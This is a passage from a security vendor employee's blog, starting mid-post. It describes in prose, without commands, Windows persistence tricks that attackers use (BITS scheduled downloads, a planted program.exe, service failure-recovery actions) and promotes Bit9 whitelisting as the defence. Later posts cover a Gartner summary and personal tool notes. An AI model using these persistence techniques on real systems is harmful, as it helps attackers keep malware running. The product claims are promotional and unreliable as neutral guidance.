This is pretty straightforward.  NOTPAD.EXE would be blocked because it isn’t trusted.  No matter how you tricked the user into running it, Bit9 is protecting you.  When you get the block alert, it’s time to wipe the drive, but only when get around to it… after all, you are protected by Bit9.


BITS is the Background Intelligent Transfer System.  This service is used by your operating system to download patches from Microsoft or your local WSUS server.   But this service can also be used to schedule the download of an attacker’s malware to reinfect your system.   Once the attacker or his malware are on on your machine he execute BITSADMIN to schedule the download of   He schedules the job to only retry the URL once a day and automatically execute the program after it is successfully downloaded.  The attacker doesn’t put anything at that URL today.   Instead, he simply waits for you to finish your incident handling process and look the other way.   You can scan the machine with 100 different virus scanners.   Today there is no file on your system to detect.  You can do memory forensics all day.   Sorry, there is nothing running today.    Today it is just a simple configuration change to the OS.    Then when he is ready he places malware.exe on his site.   Your machine dutifully downloads the new malware and executes it.

Again, this is a very easy use case.  malware.exe wouldn’t be allowed to run.  When you get the block alert, it’s time to wipe the drive, but only when get around to it.  Bit9’s got you covered until then.

TECHNIQUE  #3  – Program.exe

When Jake and I were preparing for the Shmoocon talk that we gave on this subject, I suggested we include this technique in our presentation.    Jake disagreed because this thing has been around since the year 2000 and I quickly relented and agreed with him.  At the time we both thought that this technique is pretty lame and we shouldn’t have to worry about a THIRTEEN YEAR OLD vulnerability.   Instead I decided to do a post on the ISC to talk about the technique and see what response we got.    The response for you, our awesome supporters, was incredible.    ISC readers documented several dozen of these attacks in critical systems common to most corporate desktop images.    You made Jake a believer (he had a vulnerable OEM application you found on his laptop). The response was such that I am now convinced that an attacker can use this technique and have a great deal of confidence that his malware will be launched.   As a matter of fact, it will probably be launched by something that has system permissions.    I won’t repeat the full details of the technique here since I already covered it on the ISC.   You can check out this article if you missed it:

This is the scenario. Malware or an attacker is on your machine.   He has administrative or Power User access.   The attacker drops a file called “program.exe” on the root of your C drive.    “program.exe” is a small application that reads the command line parameters that were used to call it.  It launches the real program you had intended to call and then executes its malicious payload.   Simple but effective.

This one is interesting.  When you install the Bit9 agent, it locally approves all files on the system.  Then you setup a chain of trust.  If you have program.exe on old machines or existing gold images, Bit9 will trust it.

I would advise following the link above and understanding this issue.  It’s worth it to review gold images a bit closer when putting them in your trust based architecture in Bit9.  When doing this review, it’s a great use case for using cloud based reputation using Bit9’s Software Reputation Service (SRS).  If you have any questionable files on your image, run them through SRS.  Find out what the world thinks about them.  Another bit of advice for vetting gold images: review unsigned code!  You can even detonate files in a FireEye MAS, if you have one.

If you do find any malware like this program.exe, globally ban it in Bit9 (and delete it from your gold image)!  This will instantly protect all existing computers running the Bit9 agent.  Global Bans even work on Bit9 agents running in Monitor-only mode.  No need to wipe every drive immediately when you are protected with Bit9.

Technique #4 –  Service Failure Recovery Startups

You can configure Windows services with an automatic recovery action.  The defined action will be taken when the service crashes unexpectedly.    You can see these on the recovery tab for a service using services.msc.   Here you see this service first tries to restart the service, then it will …. ummm… whats that??  ..  RUN A PROGRAM.   Hmm.

This use case is also straightforward.  The malware has tricked the user, even tricked the system, but it hasn’t been tricked by Bit9.  Blocked, again.

I hope this helps shine the light on the amazing power of software whitelisting.  It changes the game in end-point protection.  You don’t have to go running after every trick in the book that may trick a user. You only have vet the software you trust, and you don’t have to wipe the drive immediately when an infection occurs.  Bit9 gives you the freedom to have endpoint protected while you wipe the drive at your convenience.

Posted in Bit9, Security | Leave a Comment »

Learn about the new Bit9 Advanced Threat Detection

Posted by Xavier Ashe on March 22, 2013


Hear Michael Bilancieri telling the compelling story about our new detection and forensics capabilities and innovative new Advanced Threat Indicators.

Bit9’s Trust-based Security Platform combines real-time sensors, Advanced Threat Indicators (ATI), and the cloud-based Bit9 Software Reputation Service to immediately detect advanced threats and malware. You won’t wait for signature file updates. No testing or updating .dat files. Bit9 specializes in advanced threat detection.

Posted in Bit9 | Leave a Comment »

Gartner’s take on Endpoint Security

Posted by Xavier Ashe on March 12, 2013

Since moving from network security to endpoint security, I’ve been soaking as much wisdom on various approaches, priorities, and opinions out there.  I came across this Gartner study titled “Predicts 2013: Endpoint Security Becomes Even More Important for Infrastructure Protection”.  It seems to hit home with many of the viewpoints I am hearing from my customers.  The Bit9 web folks have posted a copy on the Bit9 website, but here’s the gist:

Key Findings

  • Most endpoint security tools are designed to allow any application to run, unless it is known to be malicious. Restricting applications that are allowed to execute to a known set of preapproved applications is gaining acceptance as a more-effective security measure for dealing with rapidly morphing malware and advanced persistent threats.
  • Malware authors typically attack the easiest and most prevalent targets. Mobile devices offer a range of possibilities along these two scales.
  • As computer processing is dispersed into operational technology (OT) systems, data sources and access points expand exponentially. Some of these objects will require security due to the sensitivity of the processing they perform and the data they provide, particularly for OT-centric enterprises.
  • Most organizations are removing URL blocks and permitting most employees to access external social media from corporate-owned and managed endpoints and networks.


  • Consider application control a key requirement of endpoint protection systems. Favor vendors that have mature workflow processes for dealing with change and have large installed bases of users from which to draw samples.
  • Focus investments in platforms that have a default-deny application control environment, or be prepared for higher costs and more potential for infections.
  • If your enterprise is involved with OT such as supervisory control and data acquisition (SCADA) systems, process control, telemetering, sensors or similar OT, immediately try for IT/OT alignment, convergence and integration to develop plans for security oversight.
  • End-user organizations should anticipate continued investments in procedures and solutions focused on managing security risks in external social media. However, solutions in this space are immature, and organizations should expect regular changes in feature sets and vendors.

Posted in Security | Tagged: , | Leave a Comment »

A free tool to Scan to PDF that WORKS!

Posted by Xavier Ashe on February 18, 2013

My move from running RedHat on the desktop back to Windows 7 hasn’t been too bumpy.  Only one big driver corruption issue that took me a couple of days to solve, but it seems running Windows is like riding a bike.  I have a need to scan a good bit of documents into a single Adobe PDF file.  The driver & software package that comes with my Lexmark printer only scans to individual files.  I had been using PDF Creator, which has a tool to suck up all the individual jpegs and put them in a PDF.  It was clunky, and often files would be out of order.

I went on a search today to find another tool to meet my needs.  I tried 5 different freeware or shareware programs.  The first four didn’t function in some way.  Most just errored out, one didn’t even run.  I finally found NAPS (Not Another PDF Scanner).  The only problem I have is that the default permissions on the program folder in which it runs keeps it from saving a config file.  Running it as Administrator worked for setting up my profile.  Now it runs fine as under regular permissions.

Just wanted to share to possible save someone else some time.  Cheers!

UPDATE; well, NAPS ended up being too buggy for me.  I went back to the developer page on Sourceforge and saw a comment that some one else has forked the project.  Yay, NAPS 2 is better!  Open Source FTW!

Posted in Personal Note | Leave a Comment »

My Evolving Security Philosophy

Posted by Xavier Ashe on February 5, 2013

From the very start of considering a move from IBM Security Systems to Bit9, I gave a lot of thought to my security philosophy.  I really do believe strongly in IBM’s security portfolio, and I wanted to make sure moving to Bit9 didn’t undercut my security philosophy.  Working for IBM taught me a lot about holistic security and how good security products are usable no matter if you have basic security maturity, or advanced.  I generally focused on the network side of security, mainly in SIEM and NIPS.  I’ve shied away from endpoint security (for the exception of dabbling in forensics and TEM), because it’s such a headache. Virus scan software is a joke, letting just about everything modern in.  Case in point with the recent attacks at the New York Times:

Over the course of three months, attackers installed 45 pieces of custom malware. The Times — which uses antivirus products made by Symantec — found only one instance in which Symantec identified an attacker’s software as malicious and quarantined it, according to Mandiant.

I see this all the time.  That’s why products like QRadar and IBM Security NIDS are so popular.  You have to fall back to the network, if can’t get control of the endpoint.  Why attack the endpoint?  It’s seems to be the easiest and most successful.  There’s typically three categories of attacks:

  1. Remote attacks launched from the internet (DoS, SQL Injection, etc.)
  2. Insider threats, and
  3. Infect an endpoint, then launch attack from within (phishing, drive-by downloads)

Network based protection is very useful at blocking and/or detecting all three of these attacks categories, but that leaves you with a perimeter based security protection.  With perimeter based security, one tries to tackle the channels of infections like email and web browsing.  There are tons of solutions that help with this, but nothing helps as soon as that endpoint walks out the door.  Network security should be used to protect infrastructure, not endpoints.

So what can be done to protect the endpoint?  IBM Tivoli Endpoint Manager does a lot to manage all the small stuff like patch management, software delivery, compliance, and virus scanning.  I say small stuff, not to dismiss its importance, but they are processes that should be in place already.  Having TEM take care of it all is just easier.

When I was at IBM and a customer was worried about the Insider Threat, we would use either TSIEM or QRadar to pull in system and audit logs.  What we usually found near pure chaos, since it’s very hard to figure out what is what within system logs.  The best approach I have found is using white list policies.  We would build profiles of acceptable behavior in an environment, filter it out, then analyze the rest.  It was a great approach and bled over into some of my other SIEM and NIPS scenarios.

The reason I bring this up is that one of the reasons I like Bit9’s software is that it employs a similar white list approach, but looks to be MUCH easier than the rat’s nest that is system and audit logs.

Let me summarize:

  • Network security is best when focused on protecting infrastructure like hosted applications and databases.  It loses effectiveness when trying to secure the endpoint.
  • As for hosted applications, security vulnerability testing and security development should be a closed loop.
  • Insider threats can only be managed if you are doing system and audit log analysis.  It’s a costly investment, but worth it to certain business sectors like banking and military.
  • Endpoint protection must include basic measures including patch management, lifecycle management, and basic written security policy.
  • I believe SIEM is critical to tie it all together and should be the single pane of glass.
  • Maturity in other security processes like identity management, access management, policy, compliance, encryption, and asset management help all your other security investments.
  • Overall security policy governance has to be tailored to the size and type of organization.

As I write this out, I see that going after endpoint security with Bit9 fits for me.  I am looking forward to learning more about its capabilities and how our customers would like to use it.

Posted in Personal Note, Security, Uncategorized | 2 Comments »

%d bloggers like this: